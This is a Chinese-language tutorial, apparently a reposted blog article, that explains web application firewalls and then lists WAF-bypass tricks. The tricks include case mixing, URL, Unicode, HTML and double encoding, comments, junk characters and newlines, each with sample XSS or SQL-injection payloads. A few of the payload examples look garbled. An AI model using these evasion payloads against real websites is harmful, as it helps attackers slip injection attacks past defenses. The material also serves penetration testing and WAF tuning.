在本篇文章中，我们将阐明与 WAF（Web 应用程序防火墙）安全性相关的所有概念。我们还将了解如何绕过防火墙，以便师傅们能够为大多数恶意威胁和漏洞做好准备。 WAF 绕过是最受关注的概念之一，因为如今高级威胁正以 Web 应用程序为目标来获取大量数据。 

什么是 Web 应用程序防火墙？

Web 应用程序防火墙 (WAF) 是一种安全工具，可为 Web 应用程序提供针对各种攻击的保护，例如 SQL 注入、跨站点脚本和其他常见漏洞。WAF 部署在 Web 服务器或应用程序前面，分析所有传入的 HTTP/HTTPS 流量并阻止任何符合预定义安全规则的请求。

可以将它们配置为根据 IP 地址、用户代理和其他请求属性等各种标准仅允许特定类型的流量到达 Web 应用程序。WAF 使用多种技术来检测和预防攻击，例如基于签名的检测、异常检测和行为分析。

它们还可以提供其他安全功能，例如加密和身份验证。WAF 是保护 Web 应用程序的重要工具，但它们并不是完整的解决方案，应与其他安全措施（例如安全编码实践、定期漏洞扫描和渗透测试）结合使用。

WAF 如何工作？

Web 应用程序防火墙 (WAF) 的工作原理是检查传入 Web 应用程序的 Web 流量、分析请求并根据一组预定义的安全规则阻止任何恶意或可疑请求。以下是 WAF 工作原理的基本步骤：

1.流量拦截：WAF 位于互联网和 Web 服务器/应用程序之间，拦截所有 HTTP/HTTPS 请求。

2.流量分析：WAF 分析请求标头和正文，寻找已知的攻击模式和特征，例如 SQL 注入、跨站点脚本和其他漏洞。

3.规则匹配：WAF 根据一组预定义的安全规则检查请求，这些规则定义了允许或阻止的内容。可以配置规则以匹配特定模式，例如某种类型的 SQL 注入或特定用户代理。

4.决策：如果请求符合其中一条安全规则，WAF 将阻止该请求并向客户端发送错误消息或采取安全策略定义的其他操作。如果请求不符合任何规则，则允许其传递到 Web 服务器/应用程序。

5.日志记录和报告：WAF 记录所有流量和安全事件，允许管理员监控和分析流量和安全事件。

除了这些基本步骤之外，WAF 还可以使用机器学习和行为分析等各种先进技术来检测和预防零日攻击和其他新兴威胁。

总体而言，WAF 为 Web 应用程序提供了一层重要的安全保障，可以帮助组织防御各种攻击。

Web 应用程序防火墙的类型：

根据所需的安全操作类型，有三种可配置的防火墙模型。虽然每种类型都有各自的优点和缺点，但建议在决定哪种类型最适合自己的要求之前，先了解每种类型。

阻止名单/黑名单

这种方法根据预先定义的已知恶意行为者、IP 地址或域名列表阻止对资源的访问。这种方法可以有效抵御已知威胁，但可能无法防范新的或未知的威胁。

允许名单/白名单

此方法仅允许预先定义的已批准用户、IP 地址或域名列表访问资源。此方法可能更安全，因为它仅允许已批准实体访问，但可能更难管理，因为它需要频繁更新列表。

黑白名单相结合

这种方法结合了黑名单和白名单方法，提供了一种全面的访问控制方法。通过同时使用这两种方法，组织可以阻止已知的恶意行为者访问资源，同时允许已获批准的实体访问。

总体而言，方法的选择取决于组织的具体需求和安全要求。 

结合 WAF，可以使用黑名单、白名单和混合方法来提供针对 Web 应用程序威胁的额外保护层，从而增强安全性。

WAF 实施的类型

WAF 实施必须适合组织需求才能提供保护。下面已细分三种类型的 WAF 实施策略，以便更好地评估最适合需求的理想解决方案。

1.基于主机的 WAF

此部署选项涉及直接在 Web 服务器上安装 WAF 软件。WAF 作为操作系统内的模块或 Web 服务器软件的扩展运行。基于主机的 WAF 通常是基于软件的 WAF，可以对服务器的 Web 流量提供精细控制，但可扩展性可能有限并且需要更多资源来维护。

2.基于云的 WAF

此部署选项涉及将 WAF（Web 应用程序防火墙）部署为云中的服务。基于云的 WAF 通常由第三方提供商提供，例如 Amazon Web Services (AWS) 或 Microsoft Azure。基于云的 WAF 可以提供高度的可扩展性、灵活性和减少的维护，但成本可能更高并且需要对第三方提供商有更多的信任。

3.基于网络的 WAF

此部署选项涉及将 WAF 放置在客户端和服务器之间并监控它们之间的所有流量。基于网络的 WAF 可以基于硬件或基于软件，可以提供针对 Web 应用程序威胁的全面保护。但是，它们可能具有更高的延迟，并且需要更复杂的网络基础设施。

总体而言，WAF 部署选项的选择取决于组织的特定需求和安全要求，以及预算、现有基础设施和员工资源等因素。

可以遵循以下一些技术来绕过 WAF，以确保在威胁发现时有一个行动计划。

案例：

一些 Web 应用程序防火墙不够完善，只能过滤某些场景。为了优化有效负载的创建，可以使用大写和小写字符的组合。

标准：<script>alert()</script>
已绕过：<ScRipT>alert()</sCRipT>

URL 编码

要转换常规有效负载，可以使用 % 编码或 URL 编码等编码方法。有在线工具可用于此目的。Burp 配备了内置编码器/解码器功能。

已阻止：<svG/x=”>”/oNloaD=confirm()//
已绕过：%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F

Unicode 编码

该技术可用于大多数现代 Web 应用程序，这些应用程序通常使用 UTF-8 编码，因此容易受到攻击。

Unicode 编码的 ASCII 字符可以提供绕过安全措施的有用替代方案。可以对完整或部分有效负载进行编码以实现所需的结果。

标准：prompt()
模糊处理：\u0070r\u06f\u006dpt()

HTML 编码

通常，Web 应用程序会将特殊字符转换为 HTML 编码格式并适当地显示它们。这可以通过通用方法或数字方法实现涉及 HTML 编码的基本绕过场景。

标准：“><imgsrc=xonerror=confirm()>
编码："><img src=x onerror=confirm()> (一般形式)
编码："><imgsrc=xonerror=confirm()>（数字参考）

混合编码

Web 应用程序防火墙 (WAF) 规则通常针对特定类型的编码。但是，可以通过使用混合编码负载（结合多种编码技术）来规避此类过滤器。此外，使用制表符和换行符也有助于混淆负载。

混淆：

< AHREF=”http://66.000146.0×7.147/”> XSS </A>

使用注释

评论可以隐藏标准有效载荷向量，并且不同类型的有效载荷可能需要不同的混淆方法。

已阻止：<script>alert()</script>
绕过：<!–><script>alert/**/()/**/</script>

双重编码

双重编码是一种通过对字符进行两次编码来绕过 Web 应用程序防火墙 (WAF) 的技术。例如，如果 WAF 旨在阻止 URL 编码中使用的 % 字符，那么攻击者可以将该字符双重编码为 %25 以绕过 WAF。

通配符混淆技术

通配符混淆是一种使用通配符绕过 Web 应用程序防火墙 (WAF) 的技术。该技术涉及以 WAF 无法识别的方式对有效负载进行编码。以下代码片段演示了如何使用通配符混淆：

输入：SELECT * FROM users WHERE username = ‘admin’ AND password = ‘password’编码有效载荷：SELEC%2A%2AFROM%2A%2Ausers%2A%2AWHERE%2A%2Ausername%2A%2A%3D%2A%2A’admin’%2A%2AAND%2A%2Apassword%2A%2A%3D%2A%2A’password’解码的有效载荷：SELECT**FROM**users**WHERE**username**=**’admin’**AND**password**=**’password’

在此示例中，星号 (*) 用作通配符，以替换原始 SQL 查询中的空格。WAF 不会将编码的有效负载识别为 SQL 查询，并会允许其通过。

通过使用此技术，攻击者可以逃避旨在阻止某些字符或关键字的 WAF。

垃圾字符技术

垃圾字符技术是一种通过在有效负载中插入随机或无意义的字符来绕过 Web 应用程序防火墙 (WAF) 的方法。以下代码片段演示了如何使用垃圾字符来逃避 WAF：

基本请求：<script>confirm()</script>
混淆有效负载：<script>+-+-1-+-+confirm()</script>

换行技巧

换行技术是一种通过在有效负载中插入换行来绕过 Web 应用程序防火墙 (WAF) 的方法。

该技术涉及将有效载荷分成多行并插入换行符以隐藏恶意代码。以下是换行符技术的示例：

基本请求：<iframe src=javascript:confirm(hacker)”>混淆有效负载：<iframe src=”%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(hacker)”>

阅读原文：原文链接